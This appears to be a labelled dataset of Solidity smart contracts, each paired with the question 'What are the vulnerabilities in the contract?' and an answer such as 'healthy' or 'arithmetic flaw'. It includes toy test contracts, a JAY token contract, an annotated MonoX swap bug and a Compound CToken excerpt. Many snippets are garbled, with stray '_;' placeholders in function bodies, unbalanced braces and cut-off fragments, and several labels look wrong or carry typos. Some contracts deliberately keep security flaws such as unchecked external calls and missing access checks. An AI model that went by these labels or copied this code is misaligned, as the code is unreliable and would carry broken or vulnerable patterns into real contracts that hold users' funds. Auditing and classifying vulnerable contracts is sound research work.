11     constructor (uint x) D(x+1) public {}
12 }

13 contract C is B {
14     constructor (uint x) public { 
15        _;
16  }   
17 }
What are the vulnerabilities in the contract?
arithmetic flaw
<end of text>
1 pragma solidity >=0.4.24 <0.6.0;

2 // This test shows an order in which base constructors for C are called:
3 // B(a) calls base ctor A(a) {x = a};
4 // ctor B is called {x++};
5 // ctor C is called {x++}


6 contract A {
7     uint x;
8     constructor (uint a) public {x = a;}
9 }

10 contract B is A {
11     constructor (uint a) A(a) public {x++;}
12 }    contract C is A, B {
13     constructor (uint a) B(a) public {x++;}
14 }
What are the vulnerabilities in the contract?
healthy 
<end of text>
1 pragma solidity >=0.4.24 <0.6.0;

2 contract Foo {

3     uint a;

4     constructor () public {
5         a = 1;
6     }

7     function testConstructor() public {
8        _;
9     }

10 }
What are the vulnerabilities in the contract?
healthy 
<end of text>
1 contract ArrayNestedFixedSize {

2     // NOTE: the number of columns comes first in the declaration!
3     uint[3][2] a;
4     bool[2][2] aa;

5     constructor() {
6       _;

7     }

8     function test() public {
9         uint[3] b;
10         a[0][0] = 0;
11         a[0][1] = 1;
12         uint x = a[0][0]; //print
13         a[0][2] = 2;
14         a[1][0] = 3; //may alias with a[0][0]
15         x = a[0][0]; //print
16         a[1][1] = 4;
17         a[1][2] = 5;
18         b[0] = 5;    //may alias with a[1][0] or a[0][0]
19         x = a[0][0];  //print

20     }
21 }
What are the vulnerabilities in the contract?
healthy 
<end of text>
1 pragma solidity >=0.4.24 <0.6.0;

2 contract ArrayFixedSize {

3     uint[2] a;

4     constructor() public {}

5     function test() public {
6         a[0] = 1;
7         a[1] = 2;
8     }
9 }
What are the vulnerabilities in the contract?
healthy 
<end of text>
1 pragma solidity >=0.4.24 <0.6.0;

2 contract ArrayDynamicStorage {

3     uint[] sa;

4     function ArrayDynamicStorage() {
5        assert (sa.length == 0);
6     }
7     function test() public {
8         sa.push(10);
9         sa.push(11);
10     }
11 }
What are the vulnerabilities in the contract?
healthy 
<end of text>
1 pragma solidity >=0.4.24 <0.6.0;

2 contract LoopFor {

3     uint[2] a;

4     function testBoundedForLoop() public {
5         for (uint i = 0; i < 2; i += 1) {
6             a[i] = i;
7         }

8     }

9     uint[10] b;
    
10     function testUnboundedForLoop(uint n) public {
11         require (n > 0 && n < 10);
12         for (uint i = 0; i < n; i += 1) {
13             b[i] = i;
14         }
15         for (uint j = 0; j < n; j += 1) {
16             _;
17         }
18     }
19 }
What are the vulnerabilities in the contract?
healthy 
<end of text>
1 pragma solidity >=0.4.24 <0.6.0;

2 contract A {
3    function testTuple() public pure{
4       // (uint a, uint b) = (1, 3); //cannot handle multiple declarations in tuples
5       uint a;
6       uint b;
7       /* only support function returns as tuples
8       (a,  b) = (1, 3);
9       */

10       (a, b) = returnTuple();
11       (a, b) = returnTupleByName();

12       //(, b) = returnTuple(); //can;t handle null placeholders
13       //assert (b == 40);
14    }
   
15    function returnTuple() private pure returns (uint, uint){
16       return (4, 40); 
17    }

18    function returnTupleByName() private pure returns (uint a, uint b){
19       a = 5;
20       b = 55;
21       return (a,b); 
22    }
23 }
What are the vulnerabilities in the contract?
healthy 
<end of text>
1 pragma solidity >=0.4.24 <0.6.0;

2 contract A {
3     uint x;
4     constructor (uint a) public {x= a;}
5 }

6 contract B is A {
7     constructor (uint a) A(a) public {
8 x++;
9 }
10 }

11 contract C is A, B {
12 }
 
13 }
What are the vulnerabilities in the contract?
healthy 
<end of text>
1 pragma solidity >=0.4.24 <0.6.0;

2 // This test shows an order in which base constructors for C are called:
3 // B(a) calls base ctor A(a) {x = a};
4 // ctor B is called {x++};
5 // ctor C is called {x++}


6 contract A {
7     uint x;
8     constructor (uint a) public {x = a;}
9 }

10 contract B is A {
11     constructor (uint a) A(a) public {x++;}
12 }    contract C is A, B {
13     constructor (uint a) B(a) public {x++; 
14 }
15 }
What are the vulnerabilities in the contract?
healthy 
<end of text>
1 pragma solidity >=0.4.24 <0.6.0;

2 contract Foo {

3     uint a;

4     constructor () public {
5         a = 1;
6     }

7     function testConstructor() public {
8           _;
         
9     }

10 }
What are the vulnerabilities in the contract?
healthy 
<end of text>
1 pragma solidity >=0.4.24 <0.6.0;

2 // This test shows an order in which base constructors for C are called:
3 // B(a) calls base ctor A(a) {x = a};
4 // ctor B is called {x++};
5 // ctor C is called {x++}


6 contract A {
7     uint x;
8     constructor (uint a) public {x = a;}
9 }

10 contract B is A {
11     constructor (uint a) A(a) public {x++;}
12 }    contract C is A, B {
13     constructor (uint a) B(a) public {
14         x++;
15 }
16 }
What are the vulnerabilities in the contract?
healthy 
<end of text>
1 pragma solidity >=0.4.24 <0.6.0;
2 pragma solidity >=0.4.24 <0.6.0;

3 contract Consts {

4     constructor () public {
5         uint a;
6         address b;
7         address c;

8         a = 10;
9         b = address(0x10);
10       c = address(0x12);

11     }
12 }
What are the vulnerabilities in the contract?
healthy 
<end of text>
1 pragma solidity >=0.4.24 <0.6.0;

2 contract Branch {

3     function testIf(bool b) public returns (uint a) {
4         if (b) {
5             a = 1;
6         } else {
7             a = 2;
8         }
9     }

10     function testTernary(bool b) public returns (uint a) {
11         a = b ? 1 : 2;       
12     }

13 }
What are the vulnerabilities in the contract?
healthy 
<end of text>
1 pragma solidity >=0.4.24 <0.6.0;

2 contract DoWhileLoop {

3     function testDoWhileLoop() public {
4         uint i = 1;
5         uint sum = 0;
6         do {
7             sum += i;
8             ++i;
9         } while (i < 1);
10     }

11 }
What are the vulnerabilities in the contract?
healthy 
<end of text>
1 pragma solidity >=0.4.24 <0.6.0;

2 contract Arithmetics {

3     function addition(uint _a, uint _b) public pure returns (uint c) {
4         c = _a + _b;
      
5     }

6     function subtraction(uint _a, uint _b) public pure returns (uint c) {
7         c = _a - _b;       
8     }

9     function mutliplication(uint _a, uint _b) public pure returns (uint c) {
10         c = _a * _b;       
11     }

12     function division(uint _a, uint _b) public pure returns (uint c) {
13         c = _a / _b;      
14     }

15 }
What are the vulnerabilities in the contract?
arithmetic flaw 
integer overflow/underflow

<end of text>
1 pragma solidity >=0.4.24<0.6.0; contract Crowdsale {
2     uint raised;
3     uint goal;
4     uint deadline;

5     bool finished; // Instrumented.
6     bool canceled; // Instrumented.

7     constructor(uint _goal) public {
8         goal = _goal;
9         deadline = now + 365 days;
10     }

11     function invest() public payable {
12         require(now <= deadline);
13         raised += msg.value;
14     }

15     function finish() public {
16         require(address(this).balance >= goal);
17     }

18     function cancel() public {
19         require(address(this).balance < goal && now > deadline);      
20     }

21     function repOK() public view {
22         _;
23     }
24 }
What are the vulnerabilities in the contract?
atomicity violation 

<end of text>
1 contract JAY is ERC20, Ownable {
2     using SafeMath for uint256;
3     AggregatorV3Interface internal priceFeed;

4     address private dev;
5     uint256 public constant MIN = 1000;
6     bool private start = false;
7     bool private lockDev = false;

8     uint256 private nftsBought;
9     uint256 private nftsSold;

10     uint256 private buyNftFeeEth = 0.01 * 10**18;
11     uint256 private buyNftFeeJay = 10 * 10**18;

12     uint256 private sellNftFeeEth = 0.001 * 10**18;

13     uint256 private constant USD_PRICE_SELL = 2 * 10**18;
14     uint256 private constant USD_PRICE_BUY = 10 * 10**18;

15     uint256 private nextFeeUpdate = block.timestamp.add(7 days);

16     event Price(uint256 time, uint256 price);

17     constructor() payable ERC20("JayPeggers", "JAY") {
18         require(msg.value == 2 * 10**18);
19         dev = msg.sender;
20         _mint(msg.sender, 2 * 10**18 * MIN);
21         emit Price(block.timestamp, JAYtoETH(1 * 10**18));
22         priceFeed = AggregatorV3Interface(0x5f4eC3Df9cbd43714FE2740f5E3616155c5b8419); //main
23     }

24     function updateDevWallet(address _address) public onlyOwner {    
25         dev = _address;
26     }
27     function lockDevWallet() public onlyOwner {
28         lockDev = true;
29     }

30     function startJay() public onlyOwner {
31         start = true;
32     }

33     // Buy NFTs from Vault
34     function buyNFTs(
35         address[] calldata erc721TokenAddress,
36         uint256[] calldata erc721Ids,
37         address[] calldata erc1155TokenAddress,
38         uint256[] calldata erc1155Ids,
39         uint256[] calldata erc1155Amounts
40     ) public payable {
41         uint256 total = erc721TokenAddress.length;
42         if (total != 0) buyERC721(erc721TokenAddress, erc721Ids);

43         if (erc1155TokenAddress.length != 0)
44             total = total.add(
45                 buyERC1155(erc1155TokenAddress, erc1155Ids, erc1155Amounts)
46             );


47         (bool success, ) = dev.call{value: msg.value.div(2)}("");    
48         _burn(msg.sender, total.mul(buyNftFeeJay));
49         nftsBought += total;

50         emit Price(block.timestamp, JAYtoETH(1 * 10**18));
51     }

52     function buyERC721(address[] calldata _tokenAddress, uint256[] calldata ids)
53         internal
54     {
55         for (uint256 id = 0; id < ids.length; id++) {
56             IERC721(_tokenAddress[id]).safeTransferFrom(
57                 address(this),
58                 msg.sender,
59                 ids[id]
60             );
61         }
62     }

63     function buyERC1155(
64         address[] calldata _tokenAddress,
65         uint256[] calldata ids,
66         uint256[] calldata amounts
67     ) internal returns (uint256) {
68         uint256 amount = 0;
69         for (uint256 id = 0; id < ids.length; id++) {
70             amount = amount.add(amounts[id]);
71             IERC1155(_tokenAddress[id]).safeTransferFrom(
72                 address(this),
73                 msg.sender,
74                 ids[id],
75                 amounts[id],
76                 ""
77             );
78         }
79         return amount;
80     }

81     // Sell NFTs (Buy Jay)
82     function buyJay(
83         address[] calldata erc721TokenAddress,
84         uint256[] calldata erc721Ids,
85         address[] calldata erc1155TokenAddress,
86         uint256[] calldata erc1155Ids,
87         uint256[] calldata erc1155Amounts
88     ) public payable {
89         require(start, "Not started!");
90         uint256 total = erc721TokenAddress.length;
91         if (total != 0) buyJayWithERC721(erc721TokenAddress, erc721Ids);

92         if (erc1155TokenAddress.length != 0)
93             total = total.add(
94                 buyJayWithERC1155(
95                     erc1155TokenAddress,
96                     erc1155Ids,
97                     erc1155Amounts
98                 )
99             );

100         if (total >= 100)
101           _;
    
102         else
103            _;

104         _mint(msg.sender, ETHtoJAY(msg.value).mul(97).div(100));

105         (bool success, ) = dev.call{value: msg.value.div(34)}("");
    
106         nftsSold += total;

107         emit Price(block.timestamp, JAYtoETH(1 * 10**18));
108     }

109     function buyJayWithERC721(
110         address[] calldata _tokenAddress,
111         uint256[] calldata ids
112     ) internal {
113         for (uint256 id = 0; id < ids.length; id++) {
114             IERC721(_tokenAddress[id]).transferFrom(
115                 msg.sender,
116                 address(this),
117                 ids[id]
118             );
119         }
120     }

121     function buyJayWithERC1155(
122         address[] calldata _tokenAddress,
123         uint256[] calldata ids,
124         uint256[] calldata amounts
125     ) internal returns (uint256) {
126         uint256 amount = 0;
127         for (uint256 id = 0; id < ids.length; id++) {
128             amount = amount.add(amounts[id]);
129             IERC1155(_tokenAddress[id]).safeTransferFrom(
130                 msg.sender,
131                 address(this),
132                 ids[id],
133                 amounts[id],
134                 ""
135             );
136         }
137         return amount;
138     }

139     // Sell Jay
140     function sell(uint256 value) public {
      
141         uint256 eth = JAYtoETH(value);
142         _burn(msg.sender, value);

143         (bool success, ) = msg.sender.call{value: eth.mul(90).div(100)}("");     
144         (bool success2, ) = dev.call{value: eth.div(33)}("");


145         emit Price(block.timestamp, JAYtoETH(1 * 10**18));
146     }

147     // Buy Jay (No NFT)
148     function buyJayNoNFT() public payable {
   

149         _mint(msg.sender, ETHtoJAY(msg.value).mul(85).div(100));

150         (bool success, ) = dev.call{value: msg.value.div(20)}("");       
151         emit Price(block.timestamp, JAYtoETH(1 * 10**18));
152     }

153     //utils
154     function getBuyJayNoNFT(uint256 amount) public view returns (uint256) {
155         return
156             amount.mul(totalSupply()).div(address(this).balance).mul(85).div(
157                 100
158             );
159     }

160     function getBuyJayNFT(uint256 amount) public view returns (uint256) {
161         return
162             amount.mul(totalSupply()).div(address(this).balance).mul(97).div(
163                 100
164             );
165     }

166     function JAYtoETH(uint256 value) public view returns (uint256) {
167         return (value * address(this).balance).div(totalSupply());
168     }

169     function ETHtoJAY(uint256 value) public view returns (uint256) {
170         return value.mul(totalSupply()).div(address(this).balance.sub(value));
171     }

172     // chainlink pricefeed / fee updater
173     function getFees()
174         public
175         view
176         returns (
177             uint256,
178             uint256,
179             uint256,
180             uint256
181         )
182     {
183         return (sellNftFeeEth, buyNftFeeEth, buyNftFeeJay, nextFeeUpdate);
184     }

185     function getTotals()
186         public
187         view
188         returns (
189             uint256,
190             uint256
191         )
192     {
193         return (nftsBought, nftsSold);
194     }


195     function updateFees()
196         public
197         returns (
198             uint256,
199             uint256,
200             uint256,
201             uint256
202         )
203     {
204         (
205             uint80 roundID,
206             int256 price,
207             uint256 startedAt,
208             uint256 timeStamp,
209             uint80 answeredInRound
210         ) = priceFeed.latestRoundData();
211         uint256 _price = uint256(price).mul(1 * 10**10);
212         require(
213             timeStamp > nextFeeUpdate,
214             "Fee update every 24 hrs"
215         );

216         uint256 _sellNftFeeEth;
217         if (_price > USD_PRICE_SELL) {
218             uint256 _p = _price.div(USD_PRICE_SELL);
219             _sellNftFeeEth = uint256(1 * 10**18).div(_p);
220         } else {
221             _sellNftFeeEth = USD_PRICE_SELL.div(_price);
222         }

223         require(
224             owner() == msg.sender ||
225                 (sellNftFeeEth.div(2) < _sellNftFeeEth &&
226                     sellNftFeeEth.mul(150) > _sellNftFeeEth),
227             "Fee swing too high"
228         );

229         sellNftFeeEth = _sellNftFeeEth;

230         if (_price > USD_PRICE_BUY) {
231             uint256 _p = _price.div(USD_PRICE_BUY);
232             buyNftFeeEth = uint256(1 * 10**18).div(_p);
233         } else {
234             buyNftFeeEth = USD_PRICE_BUY.div(_price);
235         }
236         buyNftFeeJay = ETHtoJAY(buyNftFeeEth);

237         nextFeeUpdate = timeStamp.add(24 hours);
238         return (sellNftFeeEth, buyNftFeeEth, buyNftFeeJay, nextFeeUpdate);
239     }

240     function getLatestPrice() public view returns (int256) {
241         (
242             uint80 roundID,
243             int256 price,
244             uint256 startedAt,
245             uint256 timeStamp,
246             uint80 answeredInRound
247         ) = priceFeed.latestRoundData();
248         return price;
249     }

250     //receiver helpers
251     function deposit() public payable {}

252     receive() external payable {}

253     fallback() external payable {}

254     function onERC1155Received(
255         address,
256         address from,
257         uint256 id,
258         uint256 amount,
259         bytes calldata data
260     ) external pure returns (bytes4) {
261         return IERC1155Receiver.onERC1155Received.selector;
262     }
263 }
What are the vulnerabilities in the contract?
atomicity violation 
arithmetic flaw
intefer overflow/underflow
inconsistent state update
business logic flaw
<end of text>
1 pragma solidity >=0.6.0 <0.8.0;

2 import "./openzeppelin/contracts/token/ERC1155/ERC1155.sol";
3 import "./openzeppelin/contracts/token/ERC20/SafeERC20.sol";
4 import "./openzeppelin/contracts/token/ERC20/IERC20.sol";
5 import "./openzeppelin/contracts/math/SafeMath.sol";
6 import "./openzeppelin/contracts-upgradeable/proxy/Initializable.sol";
7 import "./openzeppelin/contracts-upgradeable/access/OwnableUpgradeable.sol";
8 // import "hardhat/consolse.sol";
9 import "./libraries/IMonoXPool.sol";
10 import "./libraries/IWETH.sol";
11 import "./libraries/MonoXLibrary.sol";

12 //this contract is merely for annotation: it won't compile 
13   contract Monoswap{
14 // view func for removing liquidity
15   //bug: in this remove liquidity function, there's no check on msg.sender or to addresses,
16   //it means that any address of msg.sender or to can remove the liquidity of a pool 
17   function _removeLiquidity (address _token, uint256 liquidity,
18         address to) view public returns(
19         uint256 poolValue, uint256 liquidityIn, uint256 vusdOut, uint256 tokenOut) {
        
20         uint256 tokenBalanceVusdValue;
21         uint256 vusdCredit;
22         uint256 vusdDebt;
23         PoolInfo memory pool = pools[_token];
24         (poolValue, tokenBalanceVusdValue, vusdCredit, vusdDebt) = getPool(_token);
25         uint256 _totalSupply = monoXPool.totalSupplyOf(pool.pid);
         
26         liquidityIn = monoXPool.balanceOf(to, pool.pid)>liquidity?liquidity:monoXPool.balanceOf(to, pool.pid);
27         uint256 tokenReserve = IERC20(_token).balanceOf(address(monoXPool));
        
28         if(tokenReserve < pool.tokenBalance){
29           tokenBalanceVusdValue = tokenReserve.mul(pool.price)/1e18;
30         }
    
31         if(vusdDebt>0){
32           tokenReserve = (tokenBalanceVusdValue.sub(vusdDebt)).mul(1e18).div(pool.price);
33         }
    
34         // if vusdCredit==0, vusdOut will be 0 as well
35         vusdOut = liquidityIn.mul(vusdCredit).div(_totalSupply);
    
36         tokenOut = liquidityIn.mul(tokenReserve).div(_totalSupply);
    
37       }
    
38       function swapExactTokenForETH(
39             address tokenIn,
40             uint amountIn,
41             uint amountOutMin,
42             address to,
43             uint deadline
44           ) external virtual ensure(deadline) returns (uint amountOut) {
45             IMonoXPool monoXPoolLocal = monoXPool;
46             amountOut = swapIn(tokenIn, WETH, msg.sender, address(monoXPoolLocal), amountIn);
47             require(amountOut >= amountOutMin, 'MonoX:INSUFF_OUTPUT');
48             monoXPoolLocal.withdrawWETH(amountOut);
49             monoXPoolLocal.safeTransferETH(to, amountOut);
50           }
    
  
51     function swapIn (address tokenIn, address tokenOut, address from, address to,
52             uint256 amountIn) internal lockToken(tokenIn) returns(uint256 amountOut)  {
      
53           address monoXPoolLocal = address(monoXPool);
      
54           amountIn = transferAndCheck(from,monoXPoolLocal,tokenIn,amountIn); 
          
55           // uint256 halfFeesInTokenIn = amountIn.mul(fees)/2e5;
      
56           uint256 tokenInPrice;
57           uint256 tokenOutPrice;
58           uint256 tradeVusdValue;
          
59           (tokenInPrice, tokenOutPrice, amountOut, tradeVusdValue) = getAmountOut(tokenIn, tokenOut, amountIn);
      
60           uint256 oneSideFeesInVusd = tokenInPrice.mul(amountIn.mul(fees)/2e5)/1e18;
      
61           // trading in
62           if(tokenIn==address(vUSD)){
63             vUSD.burn(monoXPoolLocal, amountIn);
64             // all fees go to the other side
65             oneSideFeesInVusd = oneSideFeesInVusd.mul(2);
66           }else{
67             //this is the buggy line 
68             _updateTokenInfo(tokenIn, tokenInPrice, 0, tradeVusdValue.add(oneSideFeesInVusd), 0);
69           }
      
70           // trading out
71           if(tokenOut==address(vUSD)){
72             vUSD.mint(to, amountOut);
73           }else{
74             if (to != monoXPoolLocal) {
75               IMonoXPool(monoXPoolLocal).safeTransferERC20Token(tokenOut, to, amountOut);
76             }            
77             _updateTokenInfo(tokenOut, tokenOutPrice, tradeVusdValue.add(oneSideFeesInVusd), 0, 
78               to == monoXPoolLocal ? amountOut : 0);
79           }
      
80           emit Swap(to, tokenIn, tokenOut, amountIn, amountOut);
          
81         }

82   }
What are the vulnerabilities in the contract?
incorrect visibility/ownership
arithmetic flaw
<end of text>
1 pragma solidity ^0.5.16;

2 import "./ComptrollerInterface.sol";
3 import "./CTokenInterfaces.sol";
4 import "./ErrorReporter.sol";
5 import "./Exponential.sol";
6 import "./EIP20Interface.sol";
7 import "./EIP20NonStandardInterface.sol";
8 import "./InterestRateModel.sol";

9 contract CToken is CTokenInterface, Exponential, TokenErrorReporter {
   
10     function initialize(ComptrollerInterface comptroller_,
11                         InterestRateModel interestRateModel_,
12                         uint initialExchangeRateMantissa_,
13                         string memory name_,
14                         string memory symbol_,
15                         uint8 decimals_) public {
      
16         // Set initial exchange rate
17         initialExchangeRateMantissa = initialExchangeRateMantissa_;
18         // Set the comptroller
19         uint err = _setComptroller(comptroller_);
       
20         // Initialize block number and borrow index (block number mocks depend on comptroller being set)
21         accrualBlockNumber = getBlockNumber();
22         borrowIndex = mantissaOne;

23         // Set the interest rate model (depends on block number / borrow index)
24         err = _setInterestRateModelFresh(interestRateModel_);     
25         name = name_;
26         symbol = symbol_;
27         decimals = decimals_;

28         // The counter starts true to prevent changing it from zero to non-zero (i.e. smaller cost/refund)
29         _notEntered = true;
30     }

   
31     function transfer(address dst, uint256 amount) external nonReentrant returns (bool) {
32         return transferTokens(msg.sender, msg.sender, dst, amount) == uint(Error.NO_ERROR);
33     }

  
34     function transferFrom(address src, address dst, uint256 amount) external nonReentrant returns (bool) {
35         return transferTokens(msg.sender, src, dst, amount) == uint(Error.NO_ERROR);
36     }

   
37     function approve(address spender, uint256 amount) external returns (bool) {
38         address src = msg.sender;
39         transferAllowances[src][spender] = amount;
40         emit Approval(src, spender, amount);
41         return true;
42     }

43     function allowance(address owner, address spender) external view returns (uint256) {
44         return transferAllowances[owner][spender];
45     }

46     function balanceOf(address owner) external view returns (uint256) {
47         return accountTokens[owner];
48     }

 
49     function balanceOfUnderlying(address owner) external returns (uint) {
50         Exp memory exchangeRate = Exp({mantissa: exchangeRateCurrent()});
51         return mul_ScalarTruncate(exchangeRate, accountTokens[owner]);
52     }


53     function getAccountSnapshot(address account) external view returns (uint, uint, uint, uint) {
54         uint cTokenBalance = getCTokenBalanceInternal(account);
55         uint borrowBalance = borrowBalanceStoredInternal(account);
56         uint exchangeRateMantissa = exchangeRateStoredInternal();

57         return (uint(Error.NO_ERROR), cTokenBalance, borrowBalance, exchangeRateMantissa);
58     }


59     function getBlockNumber() internal view returns (uint) {
60         return block.number;
61     }


62     function borrowRatePerBlock() external view returns (uint) {
63         return interestRateModel.getBorrowRate(getCashPrior(), totalBorrows, totalReserves);
64     }


65     function supplyRatePerBlock() external view returns (uint) {
66         return interestRateModel.getSupplyRate(getCashPrior(), totalBorrows, totalReserves, reserveFactorMantissa);
67     }

68     /**
69      * @notice Returns the estimated per-block borrow interest rate for this cToken after some change
70      * @return The borrow interest rate per block, scaled by 1e18
71      */
72     function estimateBorrowRatePerBlockAfterChange(uint256 change, bool repay) external view returns (uint) {
73         uint256 cashPriorNew;
74         uint256 totalBorrowsNew;

75         if (repay) {
76             cashPriorNew = add_(getCashPrior(), change);
77             totalBorrowsNew = sub_(totalBorrows, change);
78         } else {
79             cashPriorNew = sub_(getCashPrior(), change);
80             totalBorrowsNew = add_(totalBorrows, change);
81         }
82         return interestRateModel.getBorrowRate(cashPriorNew, totalBorrowsNew, totalReserves);
83     }

84     /**
85      * @notice Returns the estimated per-block supply interest rate for this cToken after some change
86      * @return The supply interest rate per block, scaled by 1e18
87      */
88     function estimateSupplyRatePerBlockAfterChange(uint256 change, bool repay) external view returns (uint) {
89         uint256 cashPriorNew;
90         uint256 totalBorrowsNew;

91         if (repay) {
92             cashPriorNew = add_(getCashPrior(), change);
93             totalBorrowsNew = sub_(totalBorrows, change);
94         } else {
95             cashPriorNew = sub_(getCashPrior(), change);
96             totalBorrowsNew = add_(totalBorrows, change);
97         }

98         return interestRateModel.getSupplyRate(cashPriorNew, totalBorrowsNew, totalReserves, reserveFactorMantissa);
99     }

100     /**
101      * @notice Returns the current total borrows plus accrued interest
102      * @return The total borrows with interest
103      */
104     function totalBorrowsCurrent() external nonReentrant returns (uint) {
105         return totalBorrows;
106     }


107     function borrowBalanceCurrent(address account) external nonReentrant returns (uint) {
      
108         return borrowBalanceStored(account);
109     }


110     function borrowBalanceStored(address account) public view returns (uint) {
111         return borrowBalanceStoredInternal(account);
112     }


113     function borrowBalanceStoredInternal(address account) internal view returns (uint) {
114         /* Get borrowBalance and borrowIndex */
115         BorrowSnapshot storage borrowSnapshot = accountBorrows[account];

116         /* If borrowBalance = 0 then borrowIndex is likely also 0.
117          * Rather than failing the calculation with a division by 0, we immediately return 0 in this case.
118          */
119         if (borrowSnapshot.principal == 0) {
120             return 0;
121         }

122         /* Calculate new borrow balance using the interest index:
123          *  recentBorrowBalance = borrower.borrowBalance * market.borrowIndex / borrower.borrowIndex
124          */
125         uint principalTimesIndex = mul_(borrowSnapshot.principal, borrowIndex);
126         uint result = div_(principalTimesIndex, borrowSnapshot.interestIndex);
127         return result;
128     }

129     /**
130      * @notice Accrue interest then return the up-to-date exchange rate
131      * @return Calculated exchange rate scaled by 1e18
132      */
133     function exchangeRateCurrent() public nonReentrant returns (uint) {
134         return exchangeRateStored();
135     }

136     /**
137      * @notice Calculates the exchange rate from the underlying to the CToken
138      * @dev This function does not accrue interest before calculating the exchange rate
139      * @return Calculated exchange rate scaled by 1e18
140      */
141     function exchangeRateStored() public view returns (uint) {
142         return exchangeRateStoredInternal();
143     }

144     /**
145      * @notice Calculates the exchange rate from the underlying to the CToken
146      * @dev This function does not accrue interest before calculating the exchange rate
147      * @return calculated exchange rate scaled by 1e18
148      */
149     function exchangeRateStoredInternal() internal view returns (uint) {
150         uint _totalSupply = totalSupply;
151         if (_totalSupply == 0) {
152             /*
153              * If there are no tokens minted:
154              *  exchangeRate = initialExchangeRate
155              */
156             return initialExchangeRateMantissa;
157         } else {
158             /*
159              * Otherwise:
160              *  exchangeRate = (totalCash + totalBorrows - totalReserves) / totalSupply
161              */
162             uint totalCash = getCashPrior();
163             uint cashPlusBorrowsMinusReserves = sub_(add_(totalCash, totalBorrows), totalReserves);
164             uint exchangeRate = div_(cashPlusBorrowsMinusReserves, Exp({mantissa: _totalSupply}));
165             return exchangeRate;
166         }
167     }

168     /**
169      * @notice Get cash balance of this cToken in the underlying asset
170      * @return The quantity of underlying asset owned by this contract
171      */
172     function getCash() external view returns (uint) {
173         return getCashPrior();
174     }

175     /**
176      * @notice Applies accrued interest to total borrows and reserves
177      * @dev This calculates interest accrued from the last checkpointed block
178      *   up to the current block and writes new checkpoint to storage.
179      */
180     function accrueInterest() public returns (uint) {
181         /* Remember the initial block number */
182         uint currentBlockNumber = getBlockNumber();
183         uint accrualBlockNumberPrior = accrualBlockNumber;

184         /* Short-circuit accumulating 0 interest */
185         if (accrualBlockNumberPrior == currentBlockNumber) {
186             return uint(Error.NO_ERROR);
187         }

188         /* Read the previous values out of storage */
189         uint cashPrior = getCashPrior();
190         uint borrowsPrior = totalBorrows;
191         uint reservesPrior = totalReserves;
192         uint borrowIndexPrior = borrowIndex;

193         /* Calculate the current borrow interest rate */
194         uint borrowRateMantissa = interestRateModel.getBorrowRate(cashPrior, borrowsPrior, reservesPrior);


195         /* Calculate the number of blocks elapsed since the last accrual */
196         uint blockDelta = sub_(currentBlockNumber, accrualBlockNumberPrior);

197         /*
198          * Calculate the interest accumulated into borrows and reserves and the new index:
199          *  simpleInterestFactor = borrowRate * blockDelta
200          *  interestAccumulated = simpleInterestFactor * totalBorrows
201          *  totalBorrowsNew = interestAccumulated + totalBorrows
202          *  totalReservesNew = interestAccumulated * reserveFactor + totalReserves
203          *  borrowIndexNew = simpleInterestFactor * borrowIndex + borrowIndex
204          */

205         Exp memory simpleInterestFactor = mul_(Exp({mantissa: borrowRateMantissa}), blockDelta);
206         uint interestAccumulated = mul_ScalarTruncate(simpleInterestFactor, borrowsPrior);
207         uint totalBorrowsNew = add_(interestAccumulated, borrowsPrior);
208         uint totalReservesNew = mul_ScalarTruncateAddUInt(Exp({mantissa: reserveFactorMantissa}), interestAccumulated, reservesPrior);
209         uint borrowIndexNew = mul_ScalarTruncateAddUInt(simpleInterestFactor, borrowIndexPrior, borrowIndexPrior);

210         /////////////////////////
211         // EFFECTS & INTERACTIONS
212         // (No safe failures beyond this point)

213         /* We write the previously calculated values into storage */
214         accrualBlockNumber = currentBlockNumber;
215         borrowIndex = borrowIndexNew;
216         totalBorrows = totalBorrowsNew;
217         totalReserves = totalReservesNew;

218         /* We emit an AccrueInterest event */
219         emit AccrueInterest(cashPrior, interestAccumulated, borrowIndexNew, totalBorrowsNew);

220         return uint(Error.NO_ERROR);
221     }

222     /**
223      * @notice Sender supplies assets into the market and receives cTokens in exchange
224      * @dev Accrues interest whether or not the operation succeeds, unless reverted
225      * @param mintAmount The amount of the underlying asset to supply
226      * @return (uint, uint) An error code (0=success, otherwise a failure, see ErrorReporter.sol), and the actual mint amount.
227      */
228     function mintInternal(uint mintAmount) internal nonReentrant returns (uint, uint) {
229         uint error = accrueInterest();
230         if (error != uint(Error.NO_ERROR)) {
231             // accrueInterest emits logs on errors, but we still want to log the fact that an attempted borrow failed
232             return (fail(Error(error), FailureInfo.MINT_ACCRUE_INTEREST_FAILED), 0);
233         }
234         // mintFresh emits the actual Mint event if successful and logs on errors, so we don't need to
235         return mintFresh(msg.sender, mintAmount);
236     }

237     /**
238      * @notice Sender redeems cTokens in exchange for the underlying asset
239      * @dev Accrues interest whether or not the operation succeeds, unless reverted
240      * @param redeemTokens The number of cTokens to redeem into underlying
241      * @return uint 0=success, otherwise a failure (see ErrorReporter.sol for details)
242      */
243     function redeemInternal(uint redeemTokens) internal nonReentrant returns (uint) {
244         uint error = accrueInterest();
245         if (error != uint(Error.NO_ERROR)) {
246             // accrueInterest emits logs on errors, but we still want to log the fact that an attempted redeem failed
247             return fail(Error(error), FailureInfo.REDEEM_ACCRUE_INTEREST_FAILED);
248         }
249         // redeemFresh emits redeem-specific logs on errors, so we don't need to
250         return redeemFresh(msg.sender, redeemTokens, 0);
251     }

252     /**
253      * @notice Sender redeems cTokens in exchange for a specified amount of underlying asset
254      * @dev Accrues interest whether or not the operation succeeds, unless reverted
255      * @param redeemAmount The amount of underlying to receive from redeeming cTokens
256      * @return uint 0=success, otherwise a failure (see ErrorReporter.sol for details)
257      */
258     function redeemUnderlyingInternal(uint redeemAmount) internal nonReentrant returns (uint) {
259         uint error = accrueInterest();
260         if (error != uint(Error.NO_ERROR)) {
261             // accrueInterest emits logs on errors, but we still want to log the fact that an attempted redeem failed
262             return fail(Error(error), FailureInfo.REDEEM_ACCRUE_INTEREST_FAILED);
263         }
264         // redeemFresh emits redeem-specific logs on errors, so we don't need to
265         return redeemFresh(msg.sender, 0, redeemAmount);
266     }

267     /**
268       * @notice Sender borrows assets from the protocol to their own address
269       * @param borrowAmount The amount of the underlying asset to borrow
270       * @return uint 0=success, otherwise a failure (see ErrorReporter.sol for details)
271       */
272     function borrowInternal(uint borrowAmount) internal nonReentrant returns (uint) {
273         uint error = accrueInterest();
274         if (error != uint(Error.NO_ERROR)) {
275             // accrueInterest emits logs on errors, but we still want to log the fact that an attempted borrow failed
276             return fail(Error(error), FailureInfo.BORROW_ACCRUE_INTEREST_FAILED);
277         }
278         // borrowFresh emits borrow-specific logs on errors, so we don't need to
279         return borrowFresh(msg.sender, borrowAmount);
